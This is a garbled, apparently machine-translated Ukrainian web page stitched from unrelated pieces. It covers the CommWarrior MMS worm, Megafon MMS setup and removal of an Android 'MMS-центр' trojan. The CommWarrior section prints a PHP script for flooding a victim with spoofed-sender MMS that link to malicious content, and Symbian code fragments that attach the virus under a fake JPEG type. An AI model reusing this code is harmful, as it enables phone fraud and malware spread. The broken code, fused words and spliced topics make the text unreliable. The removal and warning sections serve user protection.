Додаток mms центр як видалити. Увага! Шахраї розсилають віруси на Android по SMS і MMS

Використання популярного особливо серед молоді MMS-сервісу таїть в собі чимало небезпек, про які більшість користувачів, на жаль, не підозрює.

В один прекрасний день ви можете отримати MMS-повідомлення або від вашого знайомого, або з невідомого вам телефонного номера, або навіть нібито від вашого стільникового оператора. Відкриєте його і заразите свій телефон вірусом. У тексті заражених MMS-повідомлень може міститися інформація про те, що в додатку до нього знаходиться безкоштовна гравід вашого стільникового оператора, новий рингтон від одного або архів з фотографіями від вашої дочки. Все це буде переконувати вас у необхідності скачати, встановити або зберегти на карті пам'яті те, що було надіслано в повідомленні. Іноді в MMS-повідомленні може перебувати посилання на який-небудь додаток або якийсь архів в Інтернеті.

MMS-повідомлення, яке ви відкриєте на своєму мобільному телефоні, не тільки може заразити ваш апарат вірусом, але і розіслати заражені повідомлення на номери телефонів з вашої записної книжки.

Найнебезпечніше те, що коли ваш телефон буде заражений подібним чином, він сам стане атакувати абонентів мобільного зв'язкуз вашого списку контактів. Тобто ваші друзі, знайомі чи колеги будуть отримувати від вас MMS-повідомлення з вірусом. У свою чергу уражені стільникові телефони ваших колег почнуть атакувати телефонні номери зі своїх адресних книг. Подібний процес матиме лавинний характер і, в кінцевому підсумку, може призвести до масових заражень мобільних пристроїв.

В даний час подібні сценарії не дуже поширені через те, що популярність MMS-сервісів недостатньо висока, а мобільний інтернеткоштує дорого. Далеко не кожен користувач стане закачувати собі на стільниковий телефонприкріплену програму або архів, вважаючи за краще зробити це вдома на стаціонарному комп'ютері, де це буде більш економічно.

Проте, в умовах падіння цін на мобільний Інтернет, появи безлімітних тарифів, популяризації MMS-сервісу, а також при відповідному розвитку вірусних технологій, подібні сценарії в майбутньому можуть стати цілком реальними.

MMS (Multimedia Messaging Service) - це сервіс передачі повідомлень, який забезпечує автоматичну миттєву передачу особистих мультимедійних повідомлень на телефонний номерабо на адресу електронної пошти. Ця технологія кардинально змінила набір послуг, якими може користуватися абонент при передачі повідомлень. Однак з появою нових можливостей з'явилися і нові уразливості.

Так як технологія MMS дозволяє передавати разом з повідомленням файл додатка, то цим механізмом тут же скористалися віруси для свого поширення. В даний момент вже існує подібний вірус. Він носить назву CommWarrior. шкідлива програмавражає телефони Nokiaсерії 60 на базі операційної системи Symbian. примітивні і характерні для його аналогів на комп'ютері: шкідливий код передається на мобільний пристрійу вигляді вхідного MMS-повідомлення з вкладеним медіа-файлом - картинкою, аудіо- або відеозапис.

Всередині самого повідомлення знаходиться текст (всього виявлено 20 різних варіантів), який всіляко спонукає абонента стільникового зв'язкувідкрити вкладений файл. Про те, як влаштований сам вірус, буде розказано пізніше, а поки розглянемо, як зловмисник може цілеспрямовано атакувати цікавить його мобільний телефонза допомогою MMS. PHP-скрипт, представлений нижче, здійснює запит на відправку MMS-повідомлення через комерційний SMS-шлюз по протоколу http / https.

1 2 $ user = "user»;
3 $ password = "password»;
4 $ api_id = "xxx";
5 $ text = urlencode ( «Безкоштовна гра від MegaPone, завантаж і грай!»);
6 $ to = »79035555555";
7 $ from = "MegaPone»;
8 $ mms__url = »http://somesmscenter.ru/game.mms»;
9 $ ret = file ( «http://smscenter.com/auth?user=$user&password=$password&apijd=$apijd»);
10 if ($ ret == »OK») (
11 for ($ 1 = 0; $ i<100; $i++)
12 {
13 $ ret = file ( «http://smscenter.com/sendmsg?to=$to8rtext=$text»);
414 if ($ ret == «OK») echo «Success. Message was sent »;
15 }
16 }
17 else echo "Error. Message was not sent »;

Для зловмисника передача повідомлення через SMS-шлюз є кращою тим, що він може вказати в якості відправника номер, який користується довірою атакується, а в поле тексту - повідомлення, яке може спонукати жертву відкрити вкладення. У параметрі $ mms_url він встановлює адресу шкідливого вмісту, розташованого в Інтернеті. У параметрі $ from вказується номер абонента, а в поле $ text - сам текст.

MMS-повідомлення вірусу Commwarrior містять текст, що спонукає відкрити повідомлення, і файл commw.sis. Розширення прикріпленого файлу SIS вказує на те, що файл є виконуваним для платформи Symbian - найпоширенішою операційної системи для мобільних пристроїв в даний час.

Остання версія вірусу Commwarrior розсилає жертвам MMS з наступними повідомленнями:

Тема: 3DNow!
Повідомлення: 3DGame from me. It is FREE!

Тема: MatrixRemover
Повідомлення: Matrix has you. Remove matrix!

Тема: Nokia ringtoner
Повідомлення: Nokia RingtoneManager for all models.

Після того, як у якому Commwarrior SIS файл буде встановлено, що виконуються файли будуть поміщені в папку:

\ System \ apps \ CommWarrior \ commwarrior.exe
\ System \ apps \ CommWarrior \ commrec.mdl

При виконанні commwarrior.exe вірус копіюється в папки

\ System \ updates \ commrec.mdl
\ System \ updates \ commwarrior.exe
\ System \ updates \ commw.sis

Після створення файлу \ system \ updates \ commw.sis вірус приступає до розсилки MMS-повідомлень.

Розглянемо деякі деталі механізму зараження за допомогою MMS-повідомлень. Наведені уривки програмного «тіла» вірусу є неповними з міркувань безпеки, а сам розбирається код відноситься лише до відправки MMS-повідомлень і ніяк не пов'язаний з шкідливою навантаженням вірусу.

Отже, спочатку вірус створює сесію для роботи з центром повідомлень. Робиться це за допомогою наступного оператора.

iSession = CMsvSession :: OpenAsyncL (* this);

Отриманий ідентифікатор сесії використовується для створення клієнта, який буде звертатися до центру повідомлень. Такий клієнт створюється наступним чином.

iMtmReg = CCIientMtmRegistry :: NewL (* iSession);

Так як робота з центром повідомлень ведеться тільки для відправки MMS-повідомлень, то необхідно виконати перетворення створеного клієнта в MMS-клієнт.

iMmsMtm = mstatic_cast
(IMtmReg-> NewMtmL (KUidMsgTypeMultimedia));

Після того, як необхідна попередня робота виконана, вірус переходить до створення самого MMS-повідомлення. Для цього необхідно, по-перше, вказати, що повідомлення створюється в каталозі «Чернетки» мобільного телефону. Робиться це в такий спосіб.

iMmsMtm-> SwitchCurrentEntryL (KMsvDraftEntryld);

Метод SwitchCurrentEntryL, що викликається з параметром Kmsv-DraftEntryld, показує, що поточним місцем створення якраз вибирається каталог «Drafts», тобто якраз каталог «Чернетки». Після того, як каталог визначено, створюється MMS-повідомлення з параметрами «за замовчуванням». Робиться це за допомогою наступного виклику:

iMmsMtm-> CreateMessageL (iMmsMtm-> DefaultServiceL ())

Далі треба форматувати основні поля повідомлення MMS. Для цього за допомогою макросу _LIT инициализируются основні змінні. В операційній системі Symbian макрос JLIT створює змінні. Таким чином, з його допомогою визначаються наступні змінні:

LIT (KSamsNumber, «07738123456»);
_LIT (KSamsAlias, «Sam»);
_LIT (KPetesNumber, «07812654321»);
_LIT (KMessageSubject, «Nokia ringtoner»);

Змінні можуть носити довільні імена. У наведеному прикладі в змінної KSamsNumber зберігається номер атакується абонента, а в створюваної змінної KSamsAlias ​​зберігається його ім'я, вказане в записнику. У змінну KPetesNumber вписується номер відправника, а в створену змінну KMessageSubject записується тема повідомлення. Після того як всі змінні сформовані, здійснюється ініціалізація полів уже створеного MMS-повідомлення. Робиться це за допомогою методів AddAddresseeL і SetSubjectL. Першим методом передається параметр EmsvRecipientTo, який визначає поле відправника. Параметр EmsvRecipientCc инициализирует поле одержувача.

iMmsMtm-> AddAddresseeL (EMsvRecipientTo, KSamsNumber, KSamsAlias);
iMmsMtm-> AddAddresseeL (EMsvRecipientCc, KPetesNumber);
iMmsMtm-> SetSubjectL (KMessageSubject);

Для цього спочатку створюється змінна з ім'ям прикріплюватися до повідомлення файлу. В даному випадку в MMS відправляється сам вірус. Тому в якості імені файлу вказується ім'я вірусної програми.

LIT (KFileName, «virus.sis»);

Після того як змінна инициализирована, створюється екземпляр класу TfileName, який описує прикріплене послання. За допомогою методу Append створеного об'єкта attachmentFile инициализируются такі дані, як шлях до файлу та ім'я самого файлу.

TFileName attachmentFile (KPhoneRootPath);
attachmentFile.Append (KDirPictures);
attachmentFile. Append (KFileName);

Після скоєння цих дій вірус створює і описує службову інформацію за типами прикріплених файлів. Зазвичай вірус навмисно вказує невірний тип прикріпленого файлу (mime-тип), наприклад, JPG, щоб користувач не запідозрив атаку при передачі йому файлу по MMS. Визначаються mime типи за допомогою наступного програмного коду.

CMsvMimeHeaders * mimeHeaders = CMsvMimeHeaders :: NewL ();
CleanupStack :: PushL (mimeHeaders);
mimeHeaders->
SetSuggestedFilenameL (KFileName);

TBufC8<10>
mimeType (KMimeType);

CMsvAttachment * attalnfo = CMsvAttachment :: NewL (CMsvAttachment :: EMsvFile);
CleanupStack :: PushL (attalnfo);
_UT8 (KMimeType, «image / jpeg»);
TBufC8<10>mimeType (KMimeType);

У наведених вище рядках описується те, що в MMS-повідомлення прикріплений тільки один файл. Після того, як всі необхідні приготування виконані, викликається метод Create Attachment 2 L і MMS-повідомлення створюється.

iMmsMtm-> CreateAttachment2L (
* Store,
attachment,
mimeType,
* MimeHeaders,
attalnfo,
attachld);
CleanupStack :: Pop (attalnfo);
CleanupStack :: PopAndDestroy (mimeHeaders);

формування повідомлення завершується за допомогою наступних програмних рядків.

store-> CommitL ();
attachment.Close ();
CleanupStack :: PopAndDestroy (attachment);
CleanupStack :: PopAndDestroy (store);

Саме лист залишиться після повної підготовки з допомогою методу SaveMessageL ().

iMmsMtm-> SaveMessageL ();

Нарешті відправка повідомлення здійснюється наступним чином.

Таким чином, вірус є самораспространяющемуся. Описувати, як реалізується шкідлива частина вірусу, яка пересилає ваші персональні дані з телефону, ми не будемо зі зрозумілих причин. Наша мета - попередити користувача про існуючу небезпеку, а не навчити зловмисника створювати віруси.

ЗАХИСТ ВІД АТАКИ

Для того щоб убезпечити свій стільниковий телефон, необхідно бути вкрай акуратним при отриманні MMS-повідомлення. Пам'ятайте, що прикріплене до повідомлення вкладення цілком може виявитися вірусом. Саме тому далеко не завжди варто приймати MMS-повідомлення від незнайомих абонентів. Якщо ж повідомлення являє для вас інтерес, то варто обов'язково просканувати додаток антивірусним засобом на предмет наявності вірусів.

Якщо вірус все ж потрапив на ваш мобільний пристрій, то можливість безболісно від нього позбутися все ж існує. Ви можете особисто видалити шкідливий файл, якщо знаєте, де його знайти. У разі, якщо вас атакував невідомий вірус, то доведеться витратити багато часу, щоб його виявити. При цьому необхідно бути акуратним, щоб випадково не видалити системні файли.

Для того щоб самостійно видалити вірус Commwarrior, необхідний менеджер файлів з можливістю перегляду системних каталогів. За допомогою цього менеджера можна видалити з пам'яті мобільного телефону вірусну папку \ system \ apps \ commwarrior, з розташованими в ній спеціальними файлами вірусу commwarrior.exe і commrec. mdl. В каталозі \ system \ updates \ commwarrior необхідно видалити ключові вірусні файли commwarrior.exe, commrec.mdl і commw.sis. В каталозі \ system \ recogs видаленню підлягає файл commrec.mdl.

Що відбувається?

Хитрий вірус вражає смартфони тих, хто клацне по посиланню з повідомлення. Спокуса велика: повідомлення приходять від кого-то з вашого списку контактів.

Виглядають вони так:

У разі переходу за вказаною адресою на смартфон жертви завантажується програма з розширенням. apk.

Мало того, якщо ви відкриєте посилання, в ваш телефон завантажується програма (найчастіше з розширенням apk). Крім фінансових втрат вірусна програма страшна тим, що ваш телефон також починає розсилати подібні sms і mms вашим контактам зі списку. Саму ж програму просто так не відкинеш: вона блокує банером доступ до списку додатків і до налаштувань вашого смартфона.

Цією програмою вже більше року, зараз пішла чергова хвиля розсилок.

що робити, якщо прийшло повідомлення

Упс, я натиснув ...

Можна відразу віднести телефон фахівцям або спробувати прибрати «загарбника» самому.

Витягніть sim-карту з пристрою і завантажте пристрій в «безпечному режимі»: коли на смартфоні працюють тільки встановлені «заводські» додатка. Тоді ви зможете увійти в меню і видалити «загарбника».

Безпечний режим включається на різних смартфонах по-різному.

Натисніть і утримуйте кнопку живлення доти, поки не з'явиться меню вимкнення.

Виберіть пункт «Вимкнути» або «Відключити живлення» і утримуйте на ньому палець до появи ось такого меню:

Натисніть ОК і дочекайтеся перезавантаження. Коли пристрій включиться, в лівому кутку з'явиться напис «Безпечний режим».

На деяких смартфонах після натискання кнопки «Вимкнути» потрібно довго тримати кнопку зменшення гучності, тоді «Безпечний режим» включиться.

Краще заздалегідь «погуглити», як він включається на пристрої вашої моделі.

Після цього потрібно знайти і видалити небезпечний додаток. Зазвичай він називається SMS_S, SMS MMS, Послання, Повідомлення, SMS Фото, MMS Фото, Foto або схожим чином.

Не знайшли? Спробуйте видаляти по одному всі недавно встановлені програми. Потрібні ви потім завжди зможете встановити знову.

Перезавантажте пристрій. Перевірте його на віруси за допомогою вбудованого або завантаженого антивіруса. Якщо впоратися з вірусом не виходить, зверніться до фахівців.

Сьогодні абоненти мобільного оператора «Мегафон» мають відмінну можливість обмін картинками, мелодіями і відеороликами через відправку короткого мультимедійного повідомлення під назвою «ММС». В цілому, ММС - це служба, що дозволяє абоненту мобільної мережі відправляти повідомлення в вигляді музичних композицій і графічних зображень. Як правило, вартість ммс-повідомлення цілком залежить від загального обсягу переданих файлів.

Щоб було можливо отримувати і відправляти ММС-повідомлення, потрібно налаштувати сервіс:

1. Підключіть опцію "Мобільний Інтернет",
2. Замовте безкоштовно автоматичні настройки на сайті оператора,
3. Встановіть налаштування вручну, дані можна знайти на сайті Мегафон,
4. Зверніться по допомогу в офіс компанії,
5. Зверніться до оператора мобільного для підключення послуги.

Якщо Ви бажаєте дізнатися, як налаштувати ммс на Мегафоні, пропонуємо Вам ознайомитися з докладною інструкцією, наведеною на нашому порталі. Ми сподіваємося, що вся отримана Вами інформація допоможе Вам вирішити проблему налаштування ммс-повідомлень в найкоротші терміни!

Як підключити ммс на Мегафоні?

• На самому початку Вам пропонується відкрити свій браузер і прописати в адресному рядку офіційний сайт Мегафона.
• Як тільки Ви потрапите на сайт, переконайтеся, що галочка «Вибір регіону» стоїть на потрібному місці. Визначте, до якої місцевості Ваше ставлення, і виберіть вірне значення.
• Далі зайдіть в «Приватні клієнти». Ця вкладка розташовується у верхній частині екрану з правого боку.
• Слідом натисніть на вкладку «Допомога», після - виберіть «Налаштування».
• Наступним кроком буде визначення марки свого стільникового телефону. Як тільки Ви визначитеся з точною моделлю, виберіть зі списку необхідне назву.
• Після всіх виконаних дій Вам буде запропоновано ввести захисний код (Captcha). Після того, як ви введете його, натискайте на вкладку «Надіслати».
• Протягом декількох секунд на Ваш мобільний прийде коротке смс-повідомлення з докладними інструкціями подальших дій. Вам лише залишиться дотримуватися їх, і незабаром отримати доступ до відправки ммс-повідомлень.

Якщо Ви бажаєте знати, як відіслати ммс на Мегафоні, скористайтеся вищеописаними кроками для отримання всієї необхідної інформації для вирішення даної проблеми.

Як відключити ммс на Мегафоні?

У Вас виникла ситуація, коли необхідно виконати відключення ммс на Мегафоні? Чи не хочете більше користуватися послугами надсилання мультимедійних повідомлень? - Нижчеперелічені способи дадуть Вам унікальну можливість відключити ммс на своєму мобільному телефоні в найкоротші терміни!

• Для успішного відключення ммс-повідомлень на Мегафоні Вам потрібно набрати на своєму мобільному телефоні комбінацію клавіш виду «* 105 * 3 #» і натиснути на «Виклик». Цим ви вимкніть активовану послугу ммс-повідомлень.
• Якщо Ви з певних причин не зуміли відключити систему ммс-повідомлень за допомогою комбінації клавіш, ми пропонуємо Вашій увазі інший спосіб вирішення проблеми: дзвінок в технічну підтримку. Для цього наберіть на своєму телефоні номер «0500», дочекайтеся відповіді автоінформатора і натисніть цифру «0». Протягом деякого часу з Вами на зв'язок вийде черговий оператор, який вислухає Вашу проблему, намітить шляхи вирішення і дасть компетентну відповідь на поставлене запитання. Іншими словами, протягом двох-трьох хвилин Ви отримаєте докладні кроки для деактивації послуги ммс-повідомлень.
• Ви також можете звернутися в будь-який найближчий офіс ВАТ «Мегафон». Для залишення заявки на відключення послуги Вам буде потрібно пред'явити будь-який документ, що засвідчує Вашу особу. Такими є паспорт або водійські права.
• Також відключити послугу ммс-повідомлень Ви можете на сайті ВАТ «Мегафон». Ми вже вели мову про цей спосіб, тому ознайомитися з ним Ви можете трохи вище.
• Для деактивації послуги ммс-повідомлень Ви можете скористатися системою «Сервіс-Гід». Все, що Вам для цього потрібно, - це наявність реєстрації в сервісі. Детальну інформацію про «Сервіс-Гіді» Ви зможете отримати на офіційному сайті Мегафона.

Яка середня вартість ммс?

Середня вартість відправки ммс-повідомлення на Мегафоні строго залежить від регіону. Як вже було сказано вище, загальна ціна за одне відправлене повідомлення варіюється від 5 до 15 рублів. У деяких регіонах вартість може бути один рубль (по акціях), в деяких - двадцять рублів.

Пам'ятайте, що отримати ммс - значить наповнитися переданим почуттям, радістю і емоціями. Якщо Ви бачите усміхнену дружину з Вашою дитиною на руках одразу після пологів - про яку ціну за користування послугою може йти мова? Що може бути приємніше дізнатися, що дитина народилася здоровою? Ризикнемо припустити, що жодні гроші миру не будуть для цього перешкодою!

Не соромтеся своїх почуттів і бажань! Надсилайте ммс-повідомлень всередині мобільного оператора Мегафон - і даруєте своїм близьким радість і посмішки!

Примітка: отримати ммс-повідомлення абонент може лише в разі підключеної послуги відправки. Якщо Ви ще не підключили систему, але бажаєте взяти вхідне повідомлення, скористайтеся вищеописаними радами, які пропонує Вам наш портал! До ваших послуг: підключення сервісу ммс-повідомлень за допомогою зв'язку з оператором, відправки смс-повідомлення, набору необхідної комбінації клавіш, через «Сервіс-Гід», за допомогою мережі Інтернет. Ми щире сподіваємося, що всі відомості, зібрані нами з даного питання, допоможуть кожному абоненту ВАТ «Мегафон» і користувачеві нашого сайту вирішити питання в найкоротші терміни!

Сьогодні наша коротка стаття розповість про дуже небезпечне зараження Андроїда вірусами MMS Beeline Центр і Теле 2. Ви дізнаєтеся наскільки небезпечний цей вірус і як видалити ММС центр.

З початку року на телефонах Андроїд став з'являтися небезпечний троян, який діє дуже хитро, маскуючись під офіційні послуги мобільних операторів, які до нього не мають абсолютно ніякого відношення.

Прийшов СМС - Обмін з доплатою

Способів проникнення цього вірусу на Андроїд пристрій дуже багато. Але судячи з кількості відгуків, лідирує проникнення через СМС: «Пропоную обмін з доплатою, ось фото». В смс також вказано посилання, пройшовши по якій, користувач завантажує на телефон заражений файл - MMS Beeline Центр або MMS Tele 2 Центр.

Як приклад, користувач завантажує на свій телефон apk файл наступного типу - «photo_b23148121_img_obmen_s_doplatoy.apk», який на перевірку є небезпечним вірусом - Android.BankBot.97.origin!

Після установки починається саме «цікаве». Видаляються всі смс з телефону, з мобільного рахунку знімаються гроші, змінювати налаштування девайса, в слідстві чого, вашим телефоном можуть керувати віддалено. Ось як один з користувачів зіткнувся з такою проблемою:

Це повідомлення приходить нібито від Авито, але нічого спільного з цим сайтом не має.Такий метод використовується шахраями через популярність інтернет ресурсу і великої довіри до нього користувачів. Людина розміщує оголошення та залишає свій номер телефону, а зловмисник використовує цей номер і формує свою базу для розсилки СМС - «Обмін з доплатою».

Як видалити вірус MMS-центр?

Троян прописується в телефоні дуже міцно і маскується під послуги мобільних операторів. Простий користувач не завжди вчасно встигає його виявити і може втратити гроші на мобільному рахунку.

Переглянувши багато відгуків і пропозицій з видалення, я виділив лише один справді дієвий спосіб. Отже, зробіть все по-пунктам:

1. Вам потрібно завантажити ваш смартфон в безпечному режимі. Як це робиться для вашої версії Андроїд подивіться в інтернеті - інформації достатньо.
2. заходимо в налаштування.
3. У списку опцій знаходимо Безпека.
4. Далі, Адміністрування - адміністратори пристроїв.
5. Заходимо і знімаємо галочку з додатка MMS-центр.
6. Тепер заходимо в Менеджер програм і в списку знаходимо MMS-центр.
7. Натискаємо Видалити і Очистити кеш.
8. Перезавантажуємо смартфон.

Залежно від версії, шлях може трохи відрізнятись, але з інтуїцією, я думаю, все в порядку.Також багато хто радить перевірити телефон мобільними антивірусами, в тому числі і Dr. Web. Ось, наприклад, ролик про аналогічний трояни.